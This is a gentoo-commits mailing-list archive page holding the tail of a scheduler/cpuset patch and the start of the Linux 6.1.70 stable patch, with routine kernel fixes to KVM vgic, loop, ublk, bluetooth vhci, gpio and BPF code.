+ 	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
+
+-	if (pi) {
+-		cpuset_read_unlock();
++	if (pi)
+ 		rt_mutex_adjust_pi(p);
+-	}
+
+ 	/* Run balance callbacks after we've adjusted the PI chain: */
+ 	balance_callbacks(rq, head);
+@@ -5755,8 +5748,6 @@ static int __sched_setscheduler(struct task_struct *p,
+ unlock:
+ 	__task_access_unlock(p, lock);
+ 	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
+-	if (pi)
+-		cpuset_read_unlock();
+ 	return retval;
+ }
+
+diff --git a/kernel/cgroup/cpuset.c b/kernel/cgroup/cpuset.c
+index 2f6606f4a3ec941f78b85a8ff997f2a6c0405218..71f5da268ee8e597ee15b2b440b4a80f8a6adb1c 100644
+--- a/kernel/cgroup/cpuset.c
++++ b/kernel/cgroup/cpuset.c
+@@ -2509,12 +2509,15 @@ static int cpuset_can_attach(struct cgroup_taskset *tset)
+ 		if (ret)
+ 			goto out_unlock;
+
++#ifndef CONFIG_SCHED_ALT
+ 		if (dl_task(task)) {
+ 			cs->nr_migrate_dl_tasks++;
+ 			cs->sum_migrate_dl_bw += task->dl.dl_bw;
+ 		}
++#endif
+ 	}
+
++#ifndef CONFIG_SCHED_ALT
+ 	if (!cs->nr_migrate_dl_tasks)
+ 		goto out_success;
+
+@@ -2535,6 +2538,7 @@ static int cpuset_can_attach(struct cgroup_taskset *tset)
+ 	}
+
+ out_success:
++#endif
+ 	/*
+ 	 * Mark attach is in progress.  This makes validate_change() fail
+ 	 * changes which zero cpus/mems_allowed.
+@@ -2558,12 +2562,14 @@ static void cpuset_cancel_attach(struct cgroup_taskset *tset)
+ 	if (!cs->attach_in_progress)
+ 		wake_up(&cpuset_attach_wq);
+
++#ifndef CONFIG_SCHED_ALT
+ 	if (cs->nr_migrate_dl_tasks) {
+ 		int cpu = cpumask_any(cs->effective_cpus);
+
+ 		dl_bw_free(cpu, cs->sum_migrate_dl_bw);
+ 		reset_migrate_dl_data(cs);
+ 	}
++#endif
+
+ 	mutex_unlock(&cpuset_mutex);
+ }
+diff --git a/kernel/sched/alt_core.c b/kernel/sched/alt_core.c
+index 4742bbdfb2d715a439c0d505b4f293a82b76b255..8badb54c7d7b00bba30dbbd7206feeafbf919af2 100644
+--- a/kernel/sched/alt_core.c
++++ b/kernel/sched/alt_core.c
+@@ -7156,8 +7156,7 @@ int cpuset_cpumask_can_shrink(const struct cpumask __maybe_unused *cur,
+ 	return 1;
+ }
+
+-int task_can_attach(struct task_struct *p,
+-		    const struct cpumask *cs_effective_cpus)
++int task_can_attach(struct task_struct *p)
+ {
+ 	int ret = 0;
+


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-01-01 13:46 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-01-01 13:46 UTC (permalink / raw
  To: gentoo-commits

commit:     d06c13ad6787d24145cad16670840bd81a4418b8
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Mon Jan  1 13:46:43 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Mon Jan  1 13:46:43 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=d06c13ad

Linux patch 6.1.70

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1069_linux-6.1.70.patch | 5394 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 5398 insertions(+)

diff --git a/0000_README b/0000_README
index 3d9aed2d..f806635e 100644
--- a/0000_README
+++ b/0000_README
@@ -319,6 +319,10 @@ Patch:  1068_linux-6.1.69.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.69
 
+Patch:  1069_linux-6.1.70.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.70
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1069_linux-6.1.70.patch b/1069_linux-6.1.70.patch
new file mode 100644
index 00000000..f22e31fe
--- /dev/null
+++ b/1069_linux-6.1.70.patch
@@ -0,0 +1,5394 @@
+diff --git a/Documentation/devicetree/bindings/nvmem/mxs-ocotp.yaml b/Documentation/devicetree/bindings/nvmem/mxs-ocotp.yaml
+index ff317fd7c15bf..2e1fcff3c2801 100644
+--- a/Documentation/devicetree/bindings/nvmem/mxs-ocotp.yaml
++++ b/Documentation/devicetree/bindings/nvmem/mxs-ocotp.yaml
+@@ -14,9 +14,11 @@ allOf:
+ 
+ properties:
+   compatible:
+-    enum:
+-      - fsl,imx23-ocotp
+-      - fsl,imx28-ocotp
++    items:
++      - enum:
++          - fsl,imx23-ocotp
++          - fsl,imx28-ocotp
++      - const: fsl,ocotp
+ 
+   "#address-cells":
+     const: 1
+@@ -40,7 +42,7 @@ additionalProperties: false
+ examples:
+   - |
+     ocotp: efuse@8002c000 {
+-        compatible = "fsl,imx28-ocotp";
++        compatible = "fsl,imx28-ocotp", "fsl,ocotp";
+         #address-cells = <1>;
+         #size-cells = <1>;
+         reg = <0x8002c000 0x2000>;
+diff --git a/Makefile b/Makefile
+index 9a3b34d2387fa..270593fcafdcd 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 69
++SUBLEVEL = 70
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/dra7.dtsi b/arch/arm/boot/dts/dra7.dtsi
+index 97ce0c4f1df7e..a79920ec461f0 100644
+--- a/arch/arm/boot/dts/dra7.dtsi
++++ b/arch/arm/boot/dts/dra7.dtsi
+@@ -144,7 +144,7 @@
+ 
+ 		l3-noc@44000000 {
+ 			compatible = "ti,dra7-l3-noc";
+-			reg = <0x44000000 0x1000>,
++			reg = <0x44000000 0x1000000>,
+ 			      <0x45000000 0x1000>;
+ 			interrupts-extended = <&crossbar_mpu GIC_SPI 4 IRQ_TYPE_LEVEL_HIGH>,
+ 					      <&wakeupgen GIC_SPI 10 IRQ_TYPE_LEVEL_HIGH>;
+diff --git a/arch/arm/mach-omap2/id.c b/arch/arm/mach-omap2/id.c
+index 59755b5a1ad7a..75091aa7269ae 100644
+--- a/arch/arm/mach-omap2/id.c
++++ b/arch/arm/mach-omap2/id.c
+@@ -793,11 +793,16 @@ void __init omap_soc_device_init(void)
+ 
+ 	soc_dev_attr->machine  = soc_name;
+ 	soc_dev_attr->family   = omap_get_family();
++	if (!soc_dev_attr->family) {
++		kfree(soc_dev_attr);
++		return;
++	}
+ 	soc_dev_attr->revision = soc_rev;
+ 	soc_dev_attr->custom_attr_group = omap_soc_groups[0];
+ 
+ 	soc_dev = soc_device_register(soc_dev_attr);
+ 	if (IS_ERR(soc_dev)) {
++		kfree(soc_dev_attr->family);
+ 		kfree(soc_dev_attr);
+ 		return;
+ 	}
+diff --git a/arch/arm64/kvm/arm.c b/arch/arm64/kvm/arm.c
+index 6cc380a15eb76..de94515fb17c6 100644
+--- a/arch/arm64/kvm/arm.c
++++ b/arch/arm64/kvm/arm.c
+@@ -386,7 +386,7 @@ void kvm_arch_vcpu_destroy(struct kvm_vcpu *vcpu)
+ 	kvm_mmu_free_memory_cache(&vcpu->arch.mmu_page_cache);
+ 	kvm_timer_vcpu_terminate(vcpu);
+ 	kvm_pmu_vcpu_destroy(vcpu);
+-
++	kvm_vgic_vcpu_destroy(vcpu);
+ 	kvm_arm_vcpu_destroy(vcpu);
+ }
+ 
+diff --git a/arch/arm64/kvm/vgic/vgic-init.c b/arch/arm64/kvm/vgic/vgic-init.c
+index f2f3bf4a04b0b..0919e3b8f46ec 100644
+--- a/arch/arm64/kvm/vgic/vgic-init.c
++++ b/arch/arm64/kvm/vgic/vgic-init.c
+@@ -368,7 +368,7 @@ static void kvm_vgic_dist_destroy(struct kvm *kvm)
+ 		vgic_v4_teardown(kvm);
+ }
+ 
+-void kvm_vgic_vcpu_destroy(struct kvm_vcpu *vcpu)
++static void __kvm_vgic_vcpu_destroy(struct kvm_vcpu *vcpu)
+ {
+ 	struct vgic_cpu *vgic_cpu = &vcpu->arch.vgic_cpu;
+ 
+@@ -379,29 +379,39 @@ void kvm_vgic_vcpu_destroy(struct kvm_vcpu *vcpu)
+ 	vgic_flush_pending_lpis(vcpu);
+ 
+ 	INIT_LIST_HEAD(&vgic_cpu->ap_list_head);
+-	vgic_cpu->rd_iodev.base_addr = VGIC_ADDR_UNDEF;
++	if (vcpu->kvm->arch.vgic.vgic_model == KVM_DEV_TYPE_ARM_VGIC_V3) {
++		vgic_unregister_redist_iodev(vcpu);
++		vgic_cpu->rd_iodev.base_addr = VGIC_ADDR_UNDEF;
++	}
+ }
+ 
+-static void __kvm_vgic_destroy(struct kvm *kvm)
++void kvm_vgic_vcpu_destroy(struct kvm_vcpu *vcpu)
++{
++	struct kvm *kvm = vcpu->kvm;
++
++	mutex_lock(&kvm->slots_lock);
++	__kvm_vgic_vcpu_destroy(vcpu);
++	mutex_unlock(&kvm->slots_lock);
++}
++
++void kvm_vgic_destroy(struct kvm *kvm)
+ {
+ 	struct kvm_vcpu *vcpu;
+ 	unsigned long i;
+ 
+-	lockdep_assert_held(&kvm->arch.config_lock);
++	mutex_lock(&kvm->slots_lock);
+ 
+ 	vgic_debug_destroy(kvm);
+ 
+ 	kvm_for_each_vcpu(i, vcpu, kvm)
+-		kvm_vgic_vcpu_destroy(vcpu);
++		__kvm_vgic_vcpu_destroy(vcpu);
++
++	mutex_lock(&kvm->arch.config_lock);
+ 
+ 	kvm_vgic_dist_destroy(kvm);
+-}
+ 
+-void kvm_vgic_destroy(struct kvm *kvm)
+-{
+-	mutex_lock(&kvm->arch.config_lock);
+-	__kvm_vgic_destroy(kvm);
+ 	mutex_unlock(&kvm->arch.config_lock);
++	mutex_unlock(&kvm->slots_lock);
+ }
+ 
+ /**
+@@ -469,25 +479,26 @@ int kvm_vgic_map_resources(struct kvm *kvm)
+ 		type = VGIC_V3;
+ 	}
+ 
+-	if (ret) {
+-		__kvm_vgic_destroy(kvm);
++	if (ret)
+ 		goto out;
+-	}
++
+ 	dist->ready = true;
+ 	dist_base = dist->vgic_dist_base;
+ 	mutex_unlock(&kvm->arch.config_lock);
+ 
+ 	ret = vgic_register_dist_iodev(kvm, dist_base, type);
+-	if (ret) {
++	if (ret)
+ 		kvm_err("Unable to register VGIC dist MMIO regions\n");
+-		kvm_vgic_destroy(kvm);
+-	}
+-	mutex_unlock(&kvm->slots_lock);
+-	return ret;
+ 
++	goto out_slots;
+ out:
+ 	mutex_unlock(&kvm->arch.config_lock);
++out_slots:
+ 	mutex_unlock(&kvm->slots_lock);
++
++	if (ret)
++		kvm_vgic_destroy(kvm);
++
+ 	return ret;
+ }
+ 
+diff --git a/arch/arm64/kvm/vgic/vgic-mmio-v3.c b/arch/arm64/kvm/vgic/vgic-mmio-v3.c
+index 188d2187eede9..871a45d4fc84c 100644
+--- a/arch/arm64/kvm/vgic/vgic-mmio-v3.c
++++ b/arch/arm64/kvm/vgic/vgic-mmio-v3.c
+@@ -820,7 +820,7 @@ out_unlock:
+ 	return ret;
+ }
+ 
+-static void vgic_unregister_redist_iodev(struct kvm_vcpu *vcpu)
++void vgic_unregister_redist_iodev(struct kvm_vcpu *vcpu)
+ {
+ 	struct vgic_io_device *rd_dev = &vcpu->arch.vgic_cpu.rd_iodev;
+ 
+diff --git a/arch/arm64/kvm/vgic/vgic.h b/arch/arm64/kvm/vgic/vgic.h
+index 23e280fa0a16f..9f80a580ca771 100644
+--- a/arch/arm64/kvm/vgic/vgic.h
++++ b/arch/arm64/kvm/vgic/vgic.h
+@@ -229,6 +229,7 @@ int vgic_v3_lpi_sync_pending_status(struct kvm *kvm, struct vgic_irq *irq);
+ int vgic_v3_save_pending_tables(struct kvm *kvm);
+ int vgic_v3_set_redist_base(struct kvm *kvm, u32 index, u64 addr, u32 count);
+ int vgic_register_redist_iodev(struct kvm_vcpu *vcpu);
++void vgic_unregister_redist_iodev(struct kvm_vcpu *vcpu);
+ bool vgic_v3_check_base(struct kvm *kvm);
+ 
+ void vgic_v3_load(struct kvm_vcpu *vcpu);
+diff --git a/arch/riscv/include/asm/signal.h b/arch/riscv/include/asm/signal.h
+index 532c29ef03769..956ae0a01bad1 100644
+--- a/arch/riscv/include/asm/signal.h
++++ b/arch/riscv/include/asm/signal.h
+@@ -7,6 +7,6 @@
+ #include <uapi/asm/ptrace.h>
+ 
+ asmlinkage __visible
+-void do_notify_resume(struct pt_regs *regs, unsigned long thread_info_flags);
++void do_work_pending(struct pt_regs *regs, unsigned long thread_info_flags);
+ 
+ #endif
+diff --git a/arch/s390/include/asm/fpu/api.h b/arch/s390/include/asm/fpu/api.h
+index b714ed0ef6885..9acf48e53a87f 100644
+--- a/arch/s390/include/asm/fpu/api.h
++++ b/arch/s390/include/asm/fpu/api.h
+@@ -79,7 +79,7 @@ static inline int test_fp_ctl(u32 fpc)
+ #define KERNEL_VXR_HIGH		(KERNEL_VXR_V16V23|KERNEL_VXR_V24V31)
+ 
+ #define KERNEL_VXR		(KERNEL_VXR_LOW|KERNEL_VXR_HIGH)
+-#define KERNEL_FPR		(KERNEL_FPC|KERNEL_VXR_V0V7)
++#define KERNEL_FPR		(KERNEL_FPC|KERNEL_VXR_LOW)
+ 
+ struct kernel_fpu;
+ 
+diff --git a/arch/x86/kernel/alternative.c b/arch/x86/kernel/alternative.c
+index 46b7ee0ab01a4..6b8c93989aa31 100644
+--- a/arch/x86/kernel/alternative.c
++++ b/arch/x86/kernel/alternative.c
+@@ -1015,8 +1015,8 @@ void __init_or_module text_poke_early(void *addr, const void *opcode,
+ 	} else {
+ 		local_irq_save(flags);
+ 		memcpy(addr, opcode, len);
+-		local_irq_restore(flags);
+ 		sync_core();
++		local_irq_restore(flags);
+ 
+ 		/*
+ 		 * Could also do a CLFLUSH here to speed up CPU recovery; but
+diff --git a/arch/x86/net/bpf_jit_comp.c b/arch/x86/net/bpf_jit_comp.c
+index 5e680e039d0e1..4686c1d9d0cfd 100644
+--- a/arch/x86/net/bpf_jit_comp.c
++++ b/arch/x86/net/bpf_jit_comp.c
+@@ -2553,3 +2553,49 @@ void bpf_jit_free(struct bpf_prog *prog)
+ 
+ 	bpf_prog_unlock_free(prog);
+ }
++
++void bpf_arch_poke_desc_update(struct bpf_jit_poke_descriptor *poke,
++			       struct bpf_prog *new, struct bpf_prog *old)
++{
++	u8 *old_addr, *new_addr, *old_bypass_addr;
++	int ret;
++
++	old_bypass_addr = old ? NULL : poke->bypass_addr;
++	old_addr = old ? (u8 *)old->bpf_func + poke->adj_off : NULL;
++	new_addr = new ? (u8 *)new->bpf_func + poke->adj_off : NULL;
++
++	/*
++	 * On program loading or teardown, the program's kallsym entry
++	 * might not be in place, so we use __bpf_arch_text_poke to skip
++	 * the kallsyms check.
++	 */
++	if (new) {
++		ret = __bpf_arch_text_poke(poke->tailcall_target,
++					   BPF_MOD_JUMP,
++					   old_addr, new_addr);
++		BUG_ON(ret < 0);
++		if (!old) {
++			ret = __bpf_arch_text_poke(poke->tailcall_bypass,
++						   BPF_MOD_JUMP,
++						   poke->bypass_addr,
++						   NULL);
++			BUG_ON(ret < 0);
++		}
++	} else {
++		ret = __bpf_arch_text_poke(poke->tailcall_bypass,
++					   BPF_MOD_JUMP,
++					   old_bypass_addr,
++					   poke->bypass_addr);
++		BUG_ON(ret < 0);
++		/* let other CPUs finish the execution of program
++		 * so that it will not possible to expose them
++		 * to invalid nop, stack unwind, nop state
++		 */
++		if (!ret)
++			synchronize_rcu();
++		ret = __bpf_arch_text_poke(poke->tailcall_target,
++					   BPF_MOD_JUMP,
++					   old_addr, NULL);
++		BUG_ON(ret < 0);
++	}
++}
+diff --git a/arch/x86/xen/Kconfig b/arch/x86/xen/Kconfig
+index 9b1ec5d8c99c8..a65fc2ae15b49 100644
+--- a/arch/x86/xen/Kconfig
++++ b/arch/x86/xen/Kconfig
+@@ -9,6 +9,7 @@ config XEN
+ 	select PARAVIRT_CLOCK
+ 	select X86_HV_CALLBACK_VECTOR
+ 	depends on X86_64 || (X86_32 && X86_PAE)
++	depends on X86_64 || (X86_GENERIC || MPENTIUM4 || MCORE2 || MATOM || MK8)
+ 	depends on X86_LOCAL_APIC && X86_TSC
+ 	help
+ 	  This is the Linux Xen port.  Enabling this will allow the
+diff --git a/drivers/block/loop.c b/drivers/block/loop.c
+index 426d0b42685a0..127e3ceb59799 100644
+--- a/drivers/block/loop.c
++++ b/drivers/block/loop.c
+@@ -1777,14 +1777,43 @@ static const struct block_device_operations lo_fops = {
+ /*
+  * If max_loop is specified, create that many devices upfront.
+  * This also becomes a hard limit. If max_loop is not specified,
++ * the default isn't a hard limit (as before commit 85c50197716c
++ * changed the default value from 0 for max_loop=0 reasons), just
+  * create CONFIG_BLK_DEV_LOOP_MIN_COUNT loop devices at module
+  * init time. Loop devices can be requested on-demand with the
+  * /dev/loop-control interface, or be instantiated by accessing
+  * a 'dead' device node.
+  */
+ static int max_loop = CONFIG_BLK_DEV_LOOP_MIN_COUNT;
+-module_param(max_loop, int, 0444);
++
++#ifdef CONFIG_BLOCK_LEGACY_AUTOLOAD
++static bool max_loop_specified;
++
++static int max_loop_param_set_int(const char *val,
++				  const struct kernel_param *kp)
++{
++	int ret;
++
++	ret = param_set_int(val, kp);
++	if (ret < 0)
++		return ret;
++
++	max_loop_specified = true;
++	return 0;
++}
++
++static const struct kernel_param_ops max_loop_param_ops = {
++	.set = max_loop_param_set_int,
++	.get = param_get_int,
++};
++
++module_param_cb(max_loop, &max_loop_param_ops, &max_loop, 0444);
+ MODULE_PARM_DESC(max_loop, "Maximum number of loop devices");
++#else
++module_param(max_loop, int, 0444);
++MODULE_PARM_DESC(max_loop, "Initial number of loop devices");
++#endif
++
+ module_param(max_part, int, 0444);
+ MODULE_PARM_DESC(max_part, "Maximum number of partitions per loop device");
+ 
+@@ -2089,14 +2118,18 @@ static void loop_remove(struct loop_device *lo)
+ 	put_disk(lo->lo_disk);
+ }
+ 
++#ifdef CONFIG_BLOCK_LEGACY_AUTOLOAD
+ static void loop_probe(dev_t dev)
+ {
+ 	int idx = MINOR(dev) >> part_shift;
+ 
+-	if (max_loop && idx >= max_loop)
++	if (max_loop_specified && max_loop && idx >= max_loop)
+ 		return;
+ 	loop_add(idx);
+ }
++#else
++#define loop_probe NULL
++#endif /* !CONFIG_BLOCK_LEGACY_AUTOLOAD */
+ 
+ static int loop_control_remove(int idx)
+ {
+@@ -2277,6 +2310,9 @@ module_exit(loop_exit);
+ static int __init max_loop_setup(char *str)
+ {
+ 	max_loop = simple_strtol(str, NULL, 0);
++#ifdef CONFIG_BLOCK_LEGACY_AUTOLOAD
++	max_loop_specified = true;
++#endif
+ 	return 1;
+ }
+ 
+diff --git a/drivers/block/ublk_drv.c b/drivers/block/ublk_drv.c
+index c2f0f74193f0e..3fa74051f31b4 100644
+--- a/drivers/block/ublk_drv.c
++++ b/drivers/block/ublk_drv.c
+@@ -103,6 +103,9 @@ struct ublk_uring_cmd_pdu {
+  */
+ #define UBLK_IO_FLAG_NEED_GET_DATA 0x08
+ 
++/* atomic RW with ubq->cancel_lock */
++#define UBLK_IO_FLAG_CANCELED	0x80000000
++
+ struct ublk_io {
+ 	/* userspace buffer address from io cmd */
+ 	__u64	addr;
+@@ -126,6 +129,7 @@ struct ublk_queue {
+ 	unsigned int max_io_sz;
+ 	bool force_abort;
+ 	unsigned short nr_io_ready;	/* how many ios setup */
++	spinlock_t		cancel_lock;
+ 	struct ublk_device *dev;
+ 	struct ublk_io ios[];
+ };
+@@ -1045,28 +1049,28 @@ static inline bool ublk_queue_ready(struct ublk_queue *ubq)
+ 	return ubq->nr_io_ready == ubq->q_depth;
+ }
+ 
+-static void ublk_cmd_cancel_cb(struct io_uring_cmd *cmd, unsigned issue_flags)
+-{
+-	io_uring_cmd_done(cmd, UBLK_IO_RES_ABORT, 0, issue_flags);
+-}
+-
+ static void ublk_cancel_queue(struct ublk_queue *ubq)
+ {
+ 	int i;
+ 
+-	if (!ublk_queue_ready(ubq))
+-		return;
+-
+ 	for (i = 0; i < ubq->q_depth; i++) {
+ 		struct ublk_io *io = &ubq->ios[i];
+ 
+-		if (io->flags & UBLK_IO_FLAG_ACTIVE)
+-			io_uring_cmd_complete_in_task(io->cmd,
+-						      ublk_cmd_cancel_cb);
+-	}
++		if (io->flags & UBLK_IO_FLAG_ACTIVE) {
++			bool done;
+ 
+-	/* all io commands are canceled */
+-	ubq->nr_io_ready = 0;
++			spin_lock(&ubq->cancel_lock);
++			done = !!(io->flags & UBLK_IO_FLAG_CANCELED);
++			if (!done)
++				io->flags |= UBLK_IO_FLAG_CANCELED;
++			spin_unlock(&ubq->cancel_lock);
++
++			if (!done)
++				io_uring_cmd_done(io->cmd,
++						UBLK_IO_RES_ABORT, 0,
++						IO_URING_F_UNLOCKED);
++		}
++	}
+ }
+ 
+ /* Cancel all pending commands, must be called after del_gendisk() returns */
+@@ -1113,7 +1117,6 @@ static void __ublk_quiesce_dev(struct ublk_device *ub)
+ 	blk_mq_quiesce_queue(ub->ub_disk->queue);
+ 	ublk_wait_tagset_rqs_idle(ub);
+ 	ub->dev_info.state = UBLK_S_DEV_QUIESCED;
+-	ublk_cancel_dev(ub);
+ 	/* we are going to release task_struct of ubq_daemon and resets
+ 	 * ->ubq_daemon to NULL. So in monitor_work, check on ubq_daemon causes UAF.
+ 	 * Besides, monitor_work is not necessary in QUIESCED state since we have
+@@ -1136,6 +1139,7 @@ static void ublk_quiesce_work_fn(struct work_struct *work)
+ 	__ublk_quiesce_dev(ub);
+  unlock:
+ 	mutex_unlock(&ub->mutex);
++	ublk_cancel_dev(ub);
+ }
+ 
+ static void ublk_unquiesce_dev(struct ublk_device *ub)
+@@ -1175,8 +1179,8 @@ static void ublk_stop_dev(struct ublk_device *ub)
+ 	put_disk(ub->ub_disk);
+ 	ub->ub_disk = NULL;
+  unlock:
+-	ublk_cancel_dev(ub);
+ 	mutex_unlock(&ub->mutex);
++	ublk_cancel_dev(ub);
+ 	cancel_delayed_work_sync(&ub->monitor_work);
+ }
+ 
+@@ -1353,6 +1357,7 @@ static int ublk_init_queue(struct ublk_device *ub, int q_id)
+ 	void *ptr;
+ 	int size;
+ 
++	spin_lock_init(&ubq->cancel_lock);
+ 	ubq->flags = ub->dev_info.flags;
+ 	ubq->q_id = q_id;
+ 	ubq->q_depth = ub->dev_info.queue_depth;
+@@ -1882,8 +1887,9 @@ static void ublk_queue_reinit(struct ublk_device *ub, struct ublk_queue *ubq)
+ 	int i;
+ 
+ 	WARN_ON_ONCE(!(ubq->ubq_daemon && ubq_daemon_is_dying(ubq)));
++
+ 	/* All old ioucmds have to be completed */
+-	WARN_ON_ONCE(ubq->nr_io_ready);
++	ubq->nr_io_ready = 0;
+ 	/* old daemon is PF_EXITING, put it now */
+ 	put_task_struct(ubq->ubq_daemon);
+ 	/* We have to reset it to NULL, otherwise ub won't accept new FETCH_REQ */
+diff --git a/drivers/bluetooth/hci_vhci.c b/drivers/bluetooth/hci_vhci.c
+index 4415d850d698b..44dc91555aa00 100644
+--- a/drivers/bluetooth/hci_vhci.c
++++ b/drivers/bluetooth/hci_vhci.c
+@@ -11,6 +11,7 @@
+ #include <linux/module.h>
+ #include <asm/unaligned.h>
+ 
++#include <linux/atomic.h>
+ #include <linux/kernel.h>
+ #include <linux/init.h>
+ #include <linux/slab.h>
+@@ -44,6 +45,7 @@ struct vhci_data {
+ 	bool wakeup;
+ 	__u16 msft_opcode;
+ 	bool aosp_capable;
++	atomic_t initialized;
+ };
+ 
+ static int vhci_open_dev(struct hci_dev *hdev)
+@@ -75,11 +77,10 @@ static int vhci_send_frame(struct hci_dev *hdev, struct sk_buff *skb)
+ 
+ 	memcpy(skb_push(skb, 1), &hci_skb_pkt_type(skb), 1);
+ 
+-	mutex_lock(&data->open_mutex);
+ 	skb_queue_tail(&data->readq, skb);
+-	mutex_unlock(&data->open_mutex);
+ 
+-	wake_up_interruptible(&data->read_wait);
++	if (atomic_read(&data->initialized))
++		wake_up_interruptible(&data->read_wait);
+ 	return 0;
+ }
+ 
+@@ -363,7 +364,8 @@ static int __vhci_create_device(struct vhci_data *data, __u8 opcode)
+ 	skb_put_u8(skb, 0xff);
+ 	skb_put_u8(skb, opcode);
+ 	put_unaligned_le16(hdev->id, skb_put(skb, 2));
+-	skb_queue_tail(&data->readq, skb);
++	skb_queue_head(&data->readq, skb);
++	atomic_inc(&data->initialized);
+ 
+ 	wake_up_interruptible(&data->read_wait);
+ 	return 0;
+diff --git a/drivers/bus/ti-sysc.c b/drivers/bus/ti-sysc.c
+index 59a2fe2448f17..15c6b85b125d4 100644
+--- a/drivers/bus/ti-sysc.c
++++ b/drivers/bus/ti-sysc.c
+@@ -2174,13 +2174,23 @@ static int sysc_reset(struct sysc *ddata)
+ 		sysc_val = sysc_read_sysconfig(ddata);
+ 		sysc_val |= sysc_mask;
+ 		sysc_write(ddata, sysc_offset, sysc_val);
+-		/* Flush posted write */
++
++		/*
++		 * Some devices need a delay before reading registers
++		 * after reset. Presumably a srst_udelay is not needed
++		 * for devices that use a rstctrl register reset.
++		 */
++		if (ddata->cfg.srst_udelay)
++			fsleep(ddata->cfg.srst_udelay);
++
++		/*
++		 * Flush posted write. For devices needing srst_udelay
++		 * this should trigger an interconnect error if the
++		 * srst_udelay value is needed but not configured.
++		 */
+ 		sysc_val = sysc_read_sysconfig(ddata);
+ 	}
+ 
+-	if (ddata->cfg.srst_udelay)
+-		fsleep(ddata->cfg.srst_udelay);
+-
+ 	if (ddata->post_reset_quirk)
+ 		ddata->post_reset_quirk(ddata);
+ 
+diff --git a/drivers/gpio/gpio-dwapb.c b/drivers/gpio/gpio-dwapb.c
+index c22fcaa44a614..6b7d47a52b10a 100644
+--- a/drivers/gpio/gpio-dwapb.c
++++ b/drivers/gpio/gpio-dwapb.c
+@@ -283,13 +283,15 @@ static void dwapb_irq_enable(struct irq_data *d)
+ {
+ 	struct gpio_chip *gc = irq_data_get_irq_chip_data(d);
+ 	struct dwapb_gpio *gpio = to_dwapb_gpio(gc);
++	irq_hw_number_t hwirq = irqd_to_hwirq(d);
+ 	unsigned long flags;
+ 	u32 val;
+ 
+ 	raw_spin_lock_irqsave(&gc->bgpio_lock, flags);
+-	val = dwapb_read(gpio, GPIO_INTEN);
+-	val |= BIT(irqd_to_hwirq(d));
++	val = dwapb_read(gpio, GPIO_INTEN) | BIT(hwirq);
+ 	dwapb_write(gpio, GPIO_INTEN, val);
++	val = dwapb_read(gpio, GPIO_INTMASK) & ~BIT(hwirq);
++	dwapb_write(gpio, GPIO_INTMASK, val);
+ 	raw_spin_unlock_irqrestore(&gc->bgpio_lock, flags);
+ }
+ 
+@@ -297,12 +299,14 @@ static void dwapb_irq_disable(struct irq_data *d)
+ {
+ 	struct gpio_chip *gc = irq_data_get_irq_chip_data(d);
+ 	struct dwapb_gpio *gpio = to_dwapb_gpio(gc);
++	irq_hw_number_t hwirq = irqd_to_hwirq(d);
+ 	unsigned long flags;
+ 	u32 val;
+ 
+ 	raw_spin_lock_irqsave(&gc->bgpio_lock, flags);
+-	val = dwapb_read(gpio, GPIO_INTEN);
+-	val &= ~BIT(irqd_to_hwirq(d));
++	val = dwapb_read(gpio, GPIO_INTMASK) | BIT(hwirq);
++	dwapb_write(gpio, GPIO_INTMASK, val);
++	val = dwapb_read(gpio, GPIO_INTEN) & ~BIT(hwirq);
+ 	dwapb_write(gpio, GPIO_INTEN, val);
+ 	raw_spin_unlock_irqrestore(&gc->bgpio_lock, flags);
+ }
+diff --git a/drivers/gpio/gpiolib-cdev.c b/drivers/gpio/gpiolib-cdev.c
+index 6ab1cf489d035..e40c93f0960b4 100644
+--- a/drivers/gpio/gpiolib-cdev.c
++++ b/drivers/gpio/gpiolib-cdev.c
+@@ -2444,10 +2444,7 @@ static int lineinfo_unwatch(struct gpio_chardev_data *cdev, void __user *ip)
+ 	return 0;
+ }
+ 
+-/*
+- * gpio_ioctl() - ioctl handler for the GPIO chardev
+- */
+-static long gpio_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
++static long gpio_ioctl_unlocked(struct file *file, unsigned int cmd, unsigned long arg)
+ {
+ 	struct gpio_chardev_data *cdev = file->private_data;
+ 	struct gpio_device *gdev = cdev->gdev;
+@@ -2484,6 +2481,17 @@ static long gpio_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
+ 	}
+ }
+ 
++/*
++ * gpio_ioctl() - ioctl handler for the GPIO chardev
++ */
++static long gpio_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
++{
++	struct gpio_chardev_data *cdev = file->private_data;
++
++	return call_ioctl_locked(file, cmd, arg, cdev->gdev,
++				 gpio_ioctl_unlocked);
++}
++
+ #ifdef CONFIG_COMPAT
+ static long gpio_ioctl_compat(struct file *file, unsigned int cmd,
+ 			      unsigned long arg)
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 6d5f3c5fb4a62..13e0b521e3dba 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -5104,6 +5104,9 @@ static void fill_dc_dirty_rects(struct drm_plane *plane,
+ 	if (plane->type == DRM_PLANE_TYPE_CURSOR)
+ 		return;
+ 
